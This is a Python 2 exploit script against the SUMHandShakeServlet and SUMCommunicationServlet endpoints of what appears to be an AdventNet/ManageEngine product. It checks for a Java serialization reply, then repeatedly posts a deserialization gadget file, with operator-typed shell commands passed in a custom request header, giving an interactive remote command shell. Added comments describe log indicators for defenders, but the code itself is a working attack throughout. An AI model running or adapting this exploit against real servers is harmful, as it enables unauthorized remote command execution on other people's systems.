import requests
import sys
import re
# Every request in this script passes verify=False, so the server certificate is
# never validated. This call only silences the urllib3 warnings (including
# InsecureRequestWarning) that would otherwise be printed for each request.
requests.packages.urllib3.disable_warnings()

# Proxy mapping handed to every request. It is empty, so the script itself sets
# no proxy. To inspect the generated traffic through a local intercepting
# proxy, use the commented-out mapping instead:
#   proxy = {
#       "http": "http://127.0.0.1:8080",
#       "https": "http://127.0.0.1:8080",
#   }
proxy = {}
def exploit(url):
    """Check ``url`` for a servlet that answers with Java-serialized data, then
    relay operator input to it in a loop.

    Python 2 only: relies on ``raw_input`` and ``str.encode('hex')``.

    Sequence, as implemented below:

    1. GET ``url`` and take the first whitespace-delimited four-digit token
       starting with ``20`` in the body as the version string.
    2. POST the contents of ``int.bin`` to the ``SUMHandShakeServlet`` path
       and hex-encode the raw reply.
    3. Print a message and exit with status -1 unless the hex reply contains
       ``aced0005``.
    4. Read ``gadget-<version>.bin`` and, for each line typed at the prompt,
       POST that file to the ``SUMCommunicationServlet`` path with the typed
       line in the ``me0me0hakxor`` request header; print the response body.

    Raises:
        AttributeError: if no year-like token is found in the landing page
            (``search`` returns ``None``).
        IOError: if ``int.bin`` or the version-specific gadget file is missing.

    Defensive notes:
        * Both servlet paths and the non-standard ``me0me0hakxor`` request
          header are visible in reverse-proxy or web-server logs and can be
          used as detection indicators.
        * What the server does with that header is not shown in this file;
          presumably the serialized payload reads it -- confirm against the
          gadget's source.
        * ``verify=False`` means none of the responses are authenticated by
          TLS, so results obtained over an untrusted path are not reliable.
    """
    http = requests.Session()
    landing = http.get(url, proxies=proxy, verify=False)

    # Version fingerprint: first " 20xx " style token in the page body.
    year_match = re.compile("\s20[0-9]{2}\s").search(landing.text)
    version = year_match.group().strip()
    print("Version: " + version)

    # Handshake request; note int.bin is opened in text mode here while the
    # gadget file further down is opened as binary.
    handshake_url = "%s/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet" % url
    handshake_body = open("int.bin").read()
    handshake_reply = http.post(handshake_url, data=handshake_body, proxies=proxy, verify=False)
    reply_hex = handshake_reply.content.encode('hex')

    # 0xACED 0x0005 is the Java Object Serialization stream header (magic +
    # stream version). The script treats its presence in the reply as the sign
    # that the endpoint exchanges serialized Java objects with clients.
    if "aced0005" not in reply_hex:
        print("[x]: Not Vulnerability")
        sys.exit(-1)

    communication_url = "%s/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet" % url
    payload = open("gadget-%s.bin" % version, 'rb').read()
    while True:
        cmd = raw_input("CMD: ")
        resp = http.post(
            communication_url,
            data=payload,
            proxies=proxy,
            headers={"me0me0hakxor": cmd},
            verify=False,
        )
        print(resp.content)
        # The sentinel is tested only after the request went out, so the
        # literal "quit" is also sent once before the loop ends.
        if cmd != "quit":
            continue
        print("Exiting ...")
        sys.exit(-1)
if __name__ == "__main__":
    # The only argument is the base URL of the host under test, used as given:
    # no scheme or format validation, and a missing argument raises IndexError.
    url = sys.argv[1]
    exploit(url)